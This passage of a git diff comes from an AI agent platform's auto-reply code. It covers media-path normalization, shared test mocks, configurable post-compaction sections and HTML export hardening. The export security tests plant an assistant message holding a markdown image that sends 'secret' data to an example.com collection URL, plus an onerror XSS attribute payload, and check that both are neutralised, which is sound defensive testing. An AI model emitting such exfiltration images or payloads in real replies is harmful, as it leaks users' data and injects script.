params.run.bashElevated, timeoutMs: params.run.timeoutMs, runId: params.runId, - allowRateLimitCooldownProbe: params.allowRateLimitCooldownProbe, + allowTransientCooldownProbe: params.allowTransientCooldownProbe, }; } diff --git a/src/auto-reply/reply/agent-runner.media-paths.test.ts b/src/auto-reply/reply/agent-runner.media-paths.test.ts new file mode 100644 index 00000000000..f5658287aff --- /dev/null +++ b/src/auto-reply/reply/agent-runner.media-paths.test.ts @@ -0,0 +1,130 @@ +import path from "node:path"; +import { beforeEach, describe, expect, it, vi } from "vitest"; +import type { TemplateContext } from "../templating.js"; +import type { FollowupRun, QueueSettings } from "./queue.js"; +import { createMockTypingController } from "./test-helpers.js"; + +const runEmbeddedPiAgentMock = vi.fn(); +const runWithModelFallbackMock = vi.fn(); + +vi.mock("../../agents/model-fallback.js", () => ({ + runWithModelFallback: (params: { + provider: string; + model: string; + run: (provider: string, model: string) => Promise; + }) => runWithModelFallbackMock(params), +})); + +vi.mock("../../agents/pi-embedded.js", async () => { + const actual = await vi.importActual( + "../../agents/pi-embedded.js", + ); + return { + ...actual, + queueEmbeddedPiMessage: vi.fn().mockReturnValue(false), + runEmbeddedPiAgent: (params: unknown) => runEmbeddedPiAgentMock(params), + }; +}); + +vi.mock("./queue.js", async () => { + const actual = await vi.importActual("./queue.js"); + return { + ...actual, + enqueueFollowupRun: vi.fn(), + scheduleFollowupDrain: vi.fn(), + }; +}); + +import { runReplyAgent } from "./agent-runner.js"; + +describe("runReplyAgent media path normalization", () => { + beforeEach(() => { + runEmbeddedPiAgentMock.mockReset(); + runWithModelFallbackMock.mockReset(); + runWithModelFallbackMock.mockImplementation( + async ({ + provider, + model, + run, + }: { + provider: string; + model: string; + run: (...args: unknown[]) => Promise; + }) => ({ + result: await run(provider, model), + provider, + model, + }), + ); + }); + + it("normalizes final MEDIA replies against the run workspace", async () => { + runEmbeddedPiAgentMock.mockResolvedValue({ + payloads: [{ text: "MEDIA:./out/generated.png" }], + meta: { + agentMeta: { + sessionId: "session", + provider: "anthropic", + model: "claude", + }, + }, + }); + + const result = await runReplyAgent({ + commandBody: "generate", + followupRun: { + prompt: "generate", + enqueuedAt: Date.now(), + run: { + agentId: "main", + agentDir: "/tmp/agent", + sessionId: "session", + sessionKey: "main", + messageProvider: "telegram", + sessionFile: "/tmp/session.jsonl", + workspaceDir: "/tmp/workspace", + config: {}, + provider: "anthropic", + model: "claude", + thinkLevel: "low", + verboseLevel: "off", + elevatedLevel: "off", + bashElevated: { + enabled: false, + allowed: false, + defaultLevel: "off", + }, + timeoutMs: 1_000, + blockReplyBreak: "message_end", + }, + } as unknown as FollowupRun, + queueKey: "main", + resolvedQueue: { mode: "interrupt" } as QueueSettings, + shouldSteer: false, + shouldFollowup: false, + isActive: false, + isStreaming: false, + typing: createMockTypingController(), + sessionCtx: { + Provider: "telegram", + Surface: "telegram", + To: "chat-1", + OriginatingTo: "chat-1", + AccountId: "default", + MessageSid: "msg-1", + } as unknown as TemplateContext, + defaultModel: "anthropic/claude", + resolvedVerboseLevel: "off", + isNewSession: false, + blockStreamingEnabled: false, + resolvedBlockStreamingBreak: "message_end", + shouldInjectGroupIntro: false, + typingMode: "instant", + }); + + expect(result).toMatchObject({ + mediaUrl: path.join("/tmp/workspace", "out", "generated.png"), + mediaUrls: [path.join("/tmp/workspace", "out", "generated.png")], + }); + }); +}); diff --git a/src/auto-reply/reply/agent-runner.runreplyagent.e2e.test.ts b/src/auto-reply/reply/agent-runner.runreplyagent.e2e.test.ts index a4f689412ab..83c1796515c 100644 --- a/src/auto-reply/reply/agent-runner.runreplyagent.e2e.test.ts +++ b/src/auto-reply/reply/agent-runner.runreplyagent.e2e.test.ts @@ -1054,6 +1054,11 @@ describe("runReplyAgent typing (heartbeat)", () => { reportedReason: "rate_limit", expectedReason: "rate limit", }, + { + existingReason: undefined, + reportedReason: "overloaded", + expectedReason: "overloaded", + }, { existingReason: "rate limit", reportedReason: "timeout", diff --git a/src/auto-reply/reply/agent-runner.ts b/src/auto-reply/reply/agent-runner.ts index 8b126382dbc..b6dcd7dcd91 100644 --- a/src/auto-reply/reply/agent-runner.ts +++ b/src/auto-reply/reply/agent-runner.ts @@ -52,6 +52,7 @@ import { resolveOriginMessageProvider, resolveOriginMessageTo } from "./origin-r import { readPostCompactionContext } from "./post-compaction-context.js"; import { resolveActiveRunQueueAction } from "./queue-policy.js"; import { enqueueFollowupRun, type FollowupRun, type QueueSettings } from "./queue.js"; +import { createReplyMediaPathNormalizer } from "./reply-media-paths.js"; import { createReplyToModeFilterForChannel, resolveReplyToMode } from "./reply-threading.js"; import { incrementRunCompactionCount, persistRunSessionUsage } from "./session-run-accounting.js"; import { createTypingSignaler } from "./typing-mode.js"; @@ -154,6 +155,11 @@ export async function runReplyAgent(params: { ); const applyReplyToMode = createReplyToModeFilterForChannel(replyToMode, replyToChannel); const cfg = followupRun.run.config; + const normalizeReplyMediaPaths = createReplyMediaPathNormalizer({ + cfg, + sessionKey, + workspaceDir: followupRun.run.workspaceDir, + }); const blockReplyCoalescing = blockStreamingEnabled && opts?.onBlockReply ? resolveEffectiveBlockStreamingConfig({ @@ -475,7 +481,7 @@ export async function runReplyAgent(params: { return finalizeWithFollowup(undefined, queueKey, runFollowupTurn); } - const payloadResult = buildReplyPayloads({ + const payloadResult = await buildReplyPayloads({ payloads: payloadArray, isHeartbeat, didLogHeartbeatStrip, @@ -495,6 +501,7 @@ export async function runReplyAgent(params: { to: sessionCtx.To, }), accountId: sessionCtx.AccountId, + normalizeMediaPaths: normalizeReplyMediaPaths, }); const { replyPayloads } = payloadResult; didLogHeartbeatStrip = payloadResult.didLogHeartbeatStrip; diff --git a/src/auto-reply/reply/dispatch-from-config.ts b/src/auto-reply/reply/dispatch-from-config.ts index 003a8f37435..786b1a7c16b 100644 --- a/src/auto-reply/reply/dispatch-from-config.ts +++ b/src/auto-reply/reply/dispatch-from-config.ts @@ -1,6 +1,11 @@ import { resolveSessionAgentId } from "../../agents/agent-scope.js"; import type { OpenClawConfig } from "../../config/config.js"; -import { loadSessionStore, resolveStorePath, type SessionEntry } from "../../config/sessions.js"; +import { + loadSessionStore, + resolveSessionStoreEntry, + resolveStorePath, + type SessionEntry, +} from "../../config/sessions.js"; import { logVerbose } from "../../globals.js"; import { fireAndForgetHook } from "../../hooks/fire-and-forget.js"; import { createInternalHookEvent, triggerInternalHook } from "../../hooks/internal-hooks.js"; @@ -65,7 +70,7 @@ const isInboundAudioContext = (ctx: FinalizedMsgContext): boolean => { return AUDIO_HEADER_RE.test(trimmed); }; -const resolveSessionStoreEntry = ( +const resolveSessionStoreLookup = ( ctx: FinalizedMsgContext, cfg: OpenClawConfig, ): { @@ -84,7 +89,7 @@ const resolveSessionStoreEntry = ( const store = loadSessionStore(storePath); return { sessionKey, - entry: store[sessionKey.toLowerCase()] ?? store[sessionKey], + entry: resolveSessionStoreEntry({ store, sessionKey }).existing, }; } catch { return { @@ -164,7 +169,7 @@ export async function dispatchReplyFromConfig(params: { return { queuedFinal: false, counts: dispatcher.getQueuedCounts() }; } - const sessionStoreEntry = resolveSessionStoreEntry(ctx, cfg); + const sessionStoreEntry = resolveSessionStoreLookup(ctx, cfg); const acpDispatchSessionKey = sessionStoreEntry.sessionKey ?? sessionKey; const inboundAudio = isInboundAudioContext(ctx); const sessionTtsAuto = normalizeTtsAutoMode(sessionStoreEntry.entry?.ttsAuto); diff --git a/src/auto-reply/reply/export-html/template.js b/src/auto-reply/reply/export-html/template.js index 565eeda7f65..da12d2625cf 100644 --- a/src/auto-reply/reply/export-html/template.js +++ b/src/auto-reply/reply/export-html/template.js @@ -665,6 +665,10 @@ return div.innerHTML; } + function escapeHtmlAttr(text) { + return escapeHtml(text).replaceAll('"', """).replaceAll("'", "'"); + } + // Validate image fields before interpolating data URLs. const SAFE_IMAGE_MIME_RE = /^image\/(png|jpeg|gif|webp|svg\+xml|bmp|tiff|avif)$/i; const SAFE_BASE64_RE = /^[A-Za-z0-9+/]+={0,2}$/; @@ -1712,6 +1716,22 @@ return text.replace(/<(?=[a-zA-Z/])/g, "<"); } + const INLINE_DATA_IMAGE_RE = /^data:image\/[a-z0-9.+-]+;base64,/i; + + function normalizeMarkdownImageLabel(text) { + const trimmed = typeof text === "string" ? text.trim() : ""; + return trimmed || "image"; + } + + function renderMarkdownImage(token) { + const label = normalizeMarkdownImageLabel(token?.text); + const href = typeof token?.href === "string" ? token.href.trim() : ""; + if (!INLINE_DATA_IMAGE_RE.test(href)) { + return escapeHtml(label); + } + return `${escapeHtmlAttr(label)}`; + } + // Configure marked with syntax highlighting and HTML escaping for text marked.use({ breaks: true, @@ -1750,6 +1770,9 @@ html(token) { return escapeHtml(token.text); }, + image(token) { + return renderMarkdownImage(token); + }, }, }); diff --git a/src/auto-reply/reply/export-html/template.security.test.ts b/src/auto-reply/reply/export-html/template.security.test.ts index 2837df7036b..9a42fd22337 100644 --- a/src/auto-reply/reply/export-html/template.security.test.ts +++ b/src/auto-reply/reply/export-html/template.security.test.ts @@ -250,4 +250,72 @@ describe("export html security hardening", () => { expect(img?.getAttribute("onerror")).toBeNull(); expect(img?.getAttribute("src")).toBe("data:application/octet-stream;base64,AAAA"); }); + + it("flattens remote markdown images but keeps data-image markdown", () => { + const dataImage = "data:image/png;base64,AAAA"; + const session: SessionData = { + header: { id: "session-4", timestamp: now() }, + entries: [ + { + id: "1", + parentId: null, + timestamp: now(), + type: "message", + message: { + role: "assistant", + content: [ + { + type: "text", + text: `Leak:\n\n![exfil](https://example.com/collect?data=secret)\n\n![pixel](${dataImage})`, + }, + ], + }, + }, + ], + leafId: "1", + systemPrompt: "", + tools: [], + }; + + const { document } = renderTemplate(session); + const messages = document.getElementById("messages"); + expect(messages).toBeTruthy(); + expect(messages?.querySelector('img[src^="https://"]')).toBeNull(); + expect(messages?.textContent).toContain("exfil"); + expect(messages?.querySelector(`img[src="${dataImage}"]`)).toBeTruthy(); + }); + + it("escapes markdown data-image attributes", () => { + const dataImage = "data:image/png;base64,AAAA"; + const session: SessionData = { + header: { id: "session-5", timestamp: now() }, + entries: [ + { + id: "1", + parentId: null, + timestamp: now(), + type: "message", + message: { + role: "assistant", + content: [ + { + type: "text", + text: `![x" onerror="alert(1)](${dataImage})`, + }, + ], + }, + }, + ], + leafId: "1", + systemPrompt: "", + tools: [], + }; + + const { document } = renderTemplate(session); + const img = document.querySelector("#messages img"); + expect(img).toBeTruthy(); + expect(img?.getAttribute("onerror")).toBeNull(); + expect(img?.getAttribute("alt")).toBe('x" onerror="alert(1)'); + expect(img?.getAttribute("src")).toBe(dataImage); + }); }); diff --git a/src/auto-reply/reply/followup-runner.ts b/src/auto-reply/reply/followup-runner.ts index 7838a83bc4d..91e78138102 100644 --- a/src/auto-reply/reply/followup-runner.ts +++ b/src/auto-reply/reply/followup-runner.ts @@ -208,7 +208,7 @@ export function createFollowupRunner(params: { bashElevated: queued.run.bashElevated, timeoutMs: queued.run.timeoutMs, runId, - allowRateLimitCooldownProbe: runOptions?.allowRateLimitCooldownProbe, + allowTransientCooldownProbe: runOptions?.allowTransientCooldownProbe, blockReplyBreak: queued.run.blockReplyBreak, bootstrapPromptWarningSignaturesSeen, bootstrapPromptWarningSignature: diff --git a/src/auto-reply/reply/get-reply.message-hooks.test.ts b/src/auto-reply/reply/get-reply.message-hooks.test.ts index c10604a9fd2..90ccab2a207 100644 --- a/src/auto-reply/reply/get-reply.message-hooks.test.ts +++ b/src/auto-reply/reply/get-reply.message-hooks.test.ts @@ -1,5 +1,6 @@ import { beforeEach, describe, expect, it, vi } from "vitest"; import type { MsgContext } from "../templating.js"; +import { registerGetReplyCommonMocks } from "./get-reply.test-mocks.js"; const mocks = vi.hoisted(() => ({ applyMediaUnderstanding: vi.fn(async (..._args: unknown[]) => undefined), @@ -10,28 +11,8 @@ const mocks = vi.hoisted(() => ({ initSessionState: vi.fn(), })); -vi.mock("../../agents/agent-scope.js", () => ({ - resolveAgentDir: vi.fn(() => "/tmp/agent"), - resolveAgentWorkspaceDir: vi.fn(() => "/tmp/workspace"), - resolveSessionAgentId: vi.fn(() => "main"), - resolveAgentSkillsFilter: vi.fn(() => undefined), -})); -vi.mock("../../agents/model-selection.js", () => ({ - resolveModelRefFromString: vi.fn(() => null), -})); -vi.mock("../../agents/timeout.js", () => ({ - resolveAgentTimeoutMs: vi.fn(() => 60000), -})); -vi.mock("../../agents/workspace.js", () => ({ - DEFAULT_AGENT_WORKSPACE_DIR: "/tmp/workspace", - ensureAgentWorkspace: vi.fn(async () => ({ dir: "/tmp/workspace" })), -})); -vi.mock("../../channels/model-overrides.js", () => ({ - resolveChannelModelOverride: vi.fn(() => undefined), -})); -vi.mock("../../config/config.js", () => ({ - loadConfig: vi.fn(() => ({})), -})); +registerGetReplyCommonMocks(); + vi.mock("../../globals.js", () => ({ logVerbose: vi.fn(), })); @@ -45,55 +26,18 @@ vi.mock("../../link-understanding/apply.js", () => ({ vi.mock("../../media-understanding/apply.js", () => ({ applyMediaUnderstanding: mocks.applyMediaUnderstanding, })); -vi.mock("../../runtime.js", () => ({ - defaultRuntime: { log: vi.fn() }, -})); -vi.mock("../command-auth.js", () => ({ - resolveCommandAuthorization: vi.fn(() => ({ isAuthorizedSender: true })), -})); vi.mock("./commands-core.js", () => ({ emitResetCommandHooks: vi.fn(async () => undefined), })); -vi.mock("./directive-handling.js", () => ({ - resolveDefaultModel: vi.fn(() => ({ - defaultProvider: "openai", - defaultModel: "gpt-4o-mini", - aliasIndex: new Map(), - })), -})); vi.mock("./get-reply-directives.js", () => ({ resolveReplyDirectives: mocks.resolveReplyDirectives, })); vi.mock("./get-reply-inline-actions.js", () => ({ handleInlineActions: vi.fn(async () => ({ kind: "reply", reply: { text: "ok" } })), })); -vi.mock("./get-reply-run.js", () => ({ - runPreparedReply: vi.fn(async () => undefined), -})); -vi.mock("./inbound-context.js", () => ({ - finalizeInboundContext: vi.fn((ctx: unknown) => ctx), -})); -vi.mock("./session-reset-model.js", () => ({ - applyResetModelOverride: vi.fn(async () => undefined), -})); vi.mock("./session.js", () => ({ initSessionState: mocks.initSessionState, })); -vi.mock("./stage-sandbox-media.js", () => ({ - stageSandboxMedia: vi.fn(async () => undefined), -})); -vi.mock("./typing.js", () => ({ - createTypingController: vi.fn(() => ({ - onReplyStart: async () => undefined, - startTypingLoop: async () => undefined, - startTypingOnText: async () => undefined, - refreshTypingTtl: () => undefined, - isActive: () => false, - markRunComplete: () => undefined, - markDispatchIdle: () => undefined, - cleanup: () => undefined, - })), -})); const { getReplyFromConfig } = await import("./get-reply.js"); diff --git a/src/auto-reply/reply/get-reply.reset-hooks-fallback.test.ts b/src/auto-reply/reply/get-reply.reset-hooks-fallback.test.ts index 7b5869a5801..110b46af476 100644 --- a/src/auto-reply/reply/get-reply.reset-hooks-fallback.test.ts +++ b/src/auto-reply/reply/get-reply.reset-hooks-fallback.test.ts @@ -1,5 +1,6 @@ import { beforeEach, describe, expect, it, vi } from "vitest"; import type { MsgContext } from "../templating.js"; +import { registerGetReplyCommonMocks } from "./get-reply.test-mocks.js"; const mocks = vi.hoisted(() => ({ resolveReplyDirectives: vi.fn(), @@ -8,83 +9,26 @@ const mocks = vi.hoisted(() => ({ initSessionState: vi.fn(), })); -vi.mock("../../agents/agent-scope.js", () => ({ - resolveAgentDir: vi.fn(() => "/tmp/agent"), - resolveAgentWorkspaceDir: vi.fn(() => "/tmp/workspace"), - resolveSessionAgentId: vi.fn(() => "main"), - resolveAgentSkillsFilter: vi.fn(() => undefined), -})); -vi.mock("../../agents/model-selection.js", () => ({ - resolveModelRefFromString: vi.fn(() => null), -})); -vi.mock("../../agents/timeout.js", () => ({ - resolveAgentTimeoutMs: vi.fn(() => 60000), -})); -vi.mock("../../agents/workspace.js", () => ({ - DEFAULT_AGENT_WORKSPACE_DIR: "/tmp/workspace", - ensureAgentWorkspace: vi.fn(async () => ({ dir: "/tmp/workspace" })), -})); -vi.mock("../../channels/model-overrides.js", () => ({ - resolveChannelModelOverride: vi.fn(() => undefined), -})); -vi.mock("../../config/config.js", () => ({ - loadConfig: vi.fn(() => ({})), -})); +registerGetReplyCommonMocks(); + vi.mock("../../link-understanding/apply.js", () => ({ applyLinkUnderstanding: vi.fn(async () => undefined), })); vi.mock("../../media-understanding/apply.js", () => ({ applyMediaUnderstanding: vi.fn(async () => undefined), })); -vi.mock("../../runtime.js", () => ({ - defaultRuntime: { log: vi.fn() }, -})); -vi.mock("../command-auth.js", () => ({ - resolveCommandAuthorization: vi.fn(() => ({ isAuthorizedSender: true })), -})); vi.mock("./commands-core.js", () => ({ emitResetCommandHooks: (...args: unknown[]) => mocks.emitResetCommandHooks(...args), })); -vi.mock("./directive-handling.js", () => ({ - resolveDefaultModel: vi.fn(() => ({ - defaultProvider: "openai", - defaultModel: "gpt-4o-mini", - aliasIndex: new Map(), - })), -})); vi.mock("./get-reply-directives.js", () => ({ resolveReplyDirectives: (...args: unknown[]) => mocks.resolveReplyDirectives(...args), })); vi.mock("./get-reply-inline-actions.js", () => ({ handleInlineActions: (...args: unknown[]) => mocks.handleInlineActions(...args), })); -vi.mock("./get-reply-run.js", () => ({ - runPreparedReply: vi.fn(async () => undefined), -})); -vi.mock("./inbound-context.js", () => ({ - finalizeInboundContext: vi.fn((ctx: unknown) => ctx), -})); -vi.mock("./session-reset-model.js", () => ({ - applyResetModelOverride: vi.fn(async () => undefined), -})); vi.mock("./session.js", () => ({ initSessionState: (...args: unknown[]) => mocks.initSessionState(...args), })); -vi.mock("./stage-sandbox-media.js", () => ({ - stageSandboxMedia: vi.fn(async () => undefined), -})); -vi.mock("./typing.js", () => ({ - createTypingController: vi.fn(() => ({ - onReplyStart: async () => undefined, - startTypingLoop: async () => undefined, - startTypingOnText: async () => undefined, - refreshTypingTtl: () => undefined, - isActive: () => false, - markRunComplete: () => undefined, - markDispatchIdle: () => undefined, - cleanup: () => undefined, - })), -})); const { getReplyFromConfig } = await import("./get-reply.js"); diff --git a/src/auto-reply/reply/get-reply.test-mocks.ts b/src/auto-reply/reply/get-reply.test-mocks.ts new file mode 100644 index 00000000000..8a73dea7cff --- /dev/null +++ b/src/auto-reply/reply/get-reply.test-mocks.ts @@ -0,0 +1,63 @@ +import { vi } from "vitest"; + +export function registerGetReplyCommonMocks(): void { + vi.mock("../../agents/agent-scope.js", () => ({ + resolveAgentDir: vi.fn(() => "/tmp/agent"), + resolveAgentWorkspaceDir: vi.fn(() => "/tmp/workspace"), + resolveSessionAgentId: vi.fn(() => "main"), + resolveAgentSkillsFilter: vi.fn(() => undefined), + })); + vi.mock("../../agents/model-selection.js", () => ({ + resolveModelRefFromString: vi.fn(() => null), + })); + vi.mock("../../agents/timeout.js", () => ({ + resolveAgentTimeoutMs: vi.fn(() => 60000), + })); + vi.mock("../../agents/workspace.js", () => ({ + DEFAULT_AGENT_WORKSPACE_DIR: "/tmp/workspace", + ensureAgentWorkspace: vi.fn(async () => ({ dir: "/tmp/workspace" })), + })); + vi.mock("../../channels/model-overrides.js", () => ({ + resolveChannelModelOverride: vi.fn(() => undefined), + })); + vi.mock("../../config/config.js", () => ({ + loadConfig: vi.fn(() => ({})), + })); + vi.mock("../../runtime.js", () => ({ + defaultRuntime: { log: vi.fn() }, + })); + vi.mock("../command-auth.js", () => ({ + resolveCommandAuthorization: vi.fn(() => ({ isAuthorizedSender: true })), + })); + vi.mock("./directive-handling.js", () => ({ + resolveDefaultModel: vi.fn(() => ({ + defaultProvider: "openai", + defaultModel: "gpt-4o-mini", + aliasIndex: new Map(), + })), + })); + vi.mock("./get-reply-run.js", () => ({ + runPreparedReply: vi.fn(async () => undefined), + })); + vi.mock("./inbound-context.js", () => ({ + finalizeInboundContext: vi.fn((ctx: unknown) => ctx), + })); + vi.mock("./session-reset-model.js", () => ({ + applyResetModelOverride: vi.fn(async () => undefined), + })); + vi.mock("./stage-sandbox-media.js", () => ({ + stageSandboxMedia: vi.fn(async () => undefined), + })); + vi.mock("./typing.js", () => ({ + createTypingController: vi.fn(() => ({ + onReplyStart: async () => undefined, + startTypingLoop: async () => undefined, + startTypingOnText: async () => undefined, + refreshTypingTtl: () => undefined, + isActive: () => false, + markRunComplete: () => undefined, + markDispatchIdle: () => undefined, + cleanup: () => undefined, + })), + })); +} diff --git a/src/auto-reply/reply/post-compaction-context.test.ts b/src/auto-reply/reply/post-compaction-context.test.ts index 34da43f2e7e..0c97df4d50b 100644 --- a/src/auto-reply/reply/post-compaction-context.test.ts +++ b/src/auto-reply/reply/post-compaction-context.test.ts @@ -228,56 +228,162 @@ Read WORKFLOW.md on startup. expect(result).toContain("Current time:"); }); - it("falls back to legacy section names (Every Session / Safety)", async () => { - const content = `# Rules + // ------------------------------------------------------------------------- + // postCompactionSections config + // ------------------------------------------------------------------------- + describe("agents.defaults.compaction.postCompactionSections", () => { + it("uses default sections (Session Startup + Red Lines) when config is not set", async () => { + const content = `## Session Startup\n\nDo startup.\n\n## Red Lines\n\nDo not break.\n\n## Other\n\nIgnore.\n`; + fs.writeFileSync(path.join(tmpDir, "AGENTS.md"), content); + const result = await readPostCompactionContext(tmpDir); + expect(result).toContain("Session Startup"); + expect(result).toContain("Red Lines"); + expect(result).not.toContain("Other"); + }); -## Every Session + it("uses custom section names from config instead of defaults", async () => { + const content = `## Session Startup\n\nDo startup.\n\n## Critical Rules\n\nMy custom rules.\n\n## Red Lines\n\nDefault section.\n`; + fs.writeFileSync(path.join(tmpDir, "AGENTS.md"), content); + const cfg = { + agents: { + defaults: { + compaction: { postCompactionSections: ["Critical Rules"] }, + }, + }, + } as OpenClawConfig; + const result = await readPostCompactionContext(tmpDir, cfg); + expect(result).not.toBeNull(); + expect(result).toContain("Critical Rules"); + expect(result).toContain("My custom rules"); + // Default sections must not be included when overridden + expect(result).not.toContain("Do startup"); + expect(result).not.toContain("Default section"); + }); -Read SOUL.md and USER.md. + it("supports multiple custom section names", async () => { + const content = `## Onboarding\n\nOnboard things.\n\n## Safety\n\nSafe things.\n\n## Noise\n\nIgnore.\n`; + fs.writeFileSync(path.join(tmpDir, "AGENTS.md"), content); + const cfg = { + agents: { + defaults: { + compaction: { postCompactionSections: ["Onboarding", "Safety"] }, + }, + }, + } as OpenClawConfig; + const result = await readPostCompactionContext(tmpDir, cfg); + expect(result).not.toBeNull(); + expect(result).toContain("Onboard things"); + expect(result).toContain("Safe things"); + expect(result).not.toContain("Ignore"); + }); -## Safety + it("returns null when postCompactionSections is explicitly set to [] (opt-out)", async () => { + const content = `## Session Startup\n\nDo startup.\n\n## Red Lines\n\nDo not break.\n`; + fs.writeFileSync(path.join(tmpDir, "AGENTS.md"), content); + const cfg = { + agents: { + defaults: { + compaction: { postCompactionSections: [] }, + }, + }, + } as OpenClawConfig; + const result = await readPostCompactionContext(tmpDir, cfg); + // Empty array = opt-out: no post-compaction context injection + expect(result).toBeNull(); + }); -Don't exfiltrate private data. + it("returns null when custom sections are configured but none found in AGENTS.md", async () => { + const content = `## Session Startup\n\nDo startup.\n`; + fs.writeFileSync(path.join(tmpDir, "AGENTS.md"), content); + const cfg = { + agents: { + defaults: { + compaction: { postCompactionSections: ["Nonexistent Section"] }, + }, + }, + } as OpenClawConfig; + const result = await readPostCompactionContext(tmpDir, cfg); + expect(result).toBeNull(); + }); -## Other + it("does NOT reference 'Session Startup' in prose when custom sections are configured", async () => { + // Greptile review finding: hardcoded prose mentioned "Execute your Session Startup + // sequence now" even when custom section names were configured, causing agents to + // look for a non-existent section. Prose must adapt to the configured section names. + const content = `## Boot Sequence\n\nDo custom boot things.\n`; + fs.writeFileSync(path.join(tmpDir, "AGENTS.md"), content); + const cfg = { + agents: { + defaults: { + compaction: { postCompactionSections: ["Boot Sequence"] }, + }, + }, + } as OpenClawConfig; + const result = await readPostCompactionContext(tmpDir, cfg); + expect(result).not.toBeNull(); + // Must not reference the hardcoded default section name + expect(result).not.toContain("Session Startup"); + // Must reference the actual configured section names + expect(result).toContain("Boot Sequence"); + }); -Ignore this. -`; - fs.writeFileSync(path.join(tmpDir, "AGENTS.md"), content); - const result = await readPostCompactionContext(tmpDir); - expect(result).not.toBeNull(); - expect(result).toContain("Every Session"); - expect(result).toContain("Read SOUL.md"); - expect(result).toContain("Safety"); - expect(result).toContain("Don't exfiltrate"); - expect(result).not.toContain("Other"); - }); + it("uses default 'Session Startup' prose when default sections are active", async () => { + const content = `## Session Startup\n\nDo startup.\n`; + fs.writeFileSync(path.join(tmpDir, "AGENTS.md"), content); + const result = await readPostCompactionContext(tmpDir); + expect(result).not.toBeNull(); + expect(result).toContain("Execute your Session Startup sequence now"); + }); - it("prefers new section names over legacy when both exist", async () => { - const content = `# Rules + it("falls back to legacy sections when defaults are explicitly configured", async () => { + // Older AGENTS.md templates use "Every Session" / "Safety" instead of + // "Session Startup" / "Red Lines". Explicitly setting the defaults should + // still trigger the legacy fallback — same behavior as leaving the field unset. + const content = `## Every Session\n\nDo startup things.\n\n## Safety\n\nBe safe.\n`; + fs.writeFileSync(path.join(tmpDir, "AGENTS.md"), content); + const cfg = { + agents: { + defaults: { + compaction: { postCompactionSections: ["Session Startup", "Red Lines"] }, + }, + }, + } as OpenClawConfig; + const result = await readPostCompactionContext(tmpDir, cfg); + expect(result).not.toBeNull(); + expect(result).toContain("Do startup things"); + expect(result).toContain("Be safe"); + }); -## Session Startup + it("falls back to legacy sections when default sections are configured in a different order", async () => { + const content = `## Every Session\n\nDo startup things.\n\n## Safety\n\nBe safe.\n`; + fs.writeFileSync(path.join(tmpDir, "AGENTS.md"), content); + const cfg = { + agents: { + defaults: { + compaction: { postCompactionSections: ["Red Lines", "Session Startup"] }, + }, + }, + } as OpenClawConfig; + const result = await readPostCompactionContext(tmpDir, cfg); + expect(result).not.toBeNull(); + expect(result).toContain("Do startup things"); + expect(result).toContain("Be safe"); + expect(result).toContain("Execute your Session Startup sequence now"); + }); -New startup instructions. - -## Every Session - -Old startup instructions. - -## Red Lines - -New red lines. - -## Safety - -Old safety rules. -`; - fs.writeFileSync(path.join(tmpDir, "AGENTS.md"), content); - const result = await readPostCompactionContext(tmpDir); - expect(result).not.toBeNull(); - expect(result).toContain("New startup instructions"); - expect(result).toContain("New red lines"); - expect(result).not.toContain("Old startup instructions"); - expect(result).not.toContain("Old safety rules"); + it("custom section names are matched case-insensitively", async () => { + const content = `## WORKFLOW INIT\n\nInit things.\n`; + fs.writeFileSync(path.join(tmpDir, "AGENTS.md"), content); + const cfg = { + agents: { + defaults: { + compaction: { postCompactionSections: ["workflow init"] }, + }, + }, + } as OpenClawConfig; + const result = await readPostCompactionContext(tmpDir, cfg); + expect(result).not.toBeNull(); + expect(result).toContain("Init things"); + }); }); }); diff --git a/src/auto-reply/reply/post-compaction-context.ts b/src/auto-reply/reply/post-compaction-context.ts index 9a326b59323..316ac3c29b1 100644 --- a/src/auto-reply/reply/post-compaction-context.ts +++ b/src/auto-reply/reply/post-compaction-context.ts @@ -6,6 +6,37 @@ import type { OpenClawConfig } from "../../config/config.js"; import { openBoundaryFile } from "../../infra/boundary-file-read.js"; const MAX_CONTEXT_CHARS = 3000; +const DEFAULT_POST_COMPACTION_SECTIONS = ["Session Startup", "Red Lines"]; +const LEGACY_POST_COMPACTION_SECTIONS = ["Every Session", "Safety"]; + +// Compare configured section names as a case-insensitive set so deployments can +// pin the documented defaults in any order without changing fallback semantics. +function matchesSectionSet(sectionNames: string[], expectedSections: string[]): boolean { + if (sectionNames.length !== expectedSections.length) { + return false; + } + + const counts = new Map(); + for (const name of expectedSections) { + const normalized = name.trim().toLowerCase(); + counts.set(normalized, (counts.get(normalized) ?? 0) + 1); + } + + for (const name of sectionNames) { + const normalized = name.trim().toLowerCase(); + const count = counts.get(normalized); + if (!count) { + return false; + } + if (count === 1) { + counts.delete(normalized); + } else { + counts.set(normalized, count - 1); + } + } + + return counts.size === 0; +} function formatDateStamp(nowMs: number, timezone: string): string { const parts = new Intl.DateTimeFormat("en-US", { @@ -53,19 +84,39 @@ export async function readPostCompactionContext( } })(); - // Extract "## Session Startup" and "## Red Lines" sections. - // Also accept legacy names "Every Session" and "Safety" for backward - // compatibility with older AGENTS.md templates. - // Each section ends at the next "## " heading or end of file - let sections = extractSections(content, ["Session Startup", "Red Lines"]); - if (sections.length === 0) { - sections = extractSections(content, ["Every Session", "Safety"]); + // Extract configured sections from AGENTS.md (default: Session Startup + Red Lines). + // An explicit empty array disables post-compaction context injection entirely. + const configuredSections = cfg?.agents?.defaults?.compaction?.postCompactionSections; + const sectionNames = Array.isArray(configuredSections) + ? configuredSections + : DEFAULT_POST_COMPACTION_SECTIONS; + + if (sectionNames.length === 0) { + return null; + } + + const foundSectionNames: string[] = []; + let sections = extractSections(content, sectionNames, foundSectionNames); + + // Fall back to legacy section names ("Every Session" / "Safety") when using + // defaults and the current headings aren't found — preserves compatibility + // with older AGENTS.md templates. The fallback also applies when the user + // explicitly configures the default pair, so that pinning the documented + // defaults never silently changes behavior vs. leaving the field unset. + const isDefaultSections = + !Array.isArray(configuredSections) || + matchesSectionSet(configuredSections, DEFAULT_POST_COMPACTION_SECTIONS); + if (sections.length === 0 && isDefaultSections) { + sections = extractSections(content, LEGACY_POST_COMPACTION_SECTIONS, foundSectionNames); } if (sections.length === 0) { return null; } + // Only reference section names that were actually found and injected. + const displayNames = foundSectionNames.length > 0 ? foundSectionNames : sectionNames; + const resolvedNowMs = nowMs ?? Date.now(); const timezone = resolveUserTimezone(cfg?.agents?.defaults?.userTimezone); const dateStamp = formatDateStamp(resolvedNowMs, timezone); @@ -79,11 +130,24 @@ export async function readPostCompactionContext( ? combined.slice(0, MAX_CONTEXT_CHARS) + "\n...[truncated]..." : combined; + // When using the default section set, use precise prose that names the + // 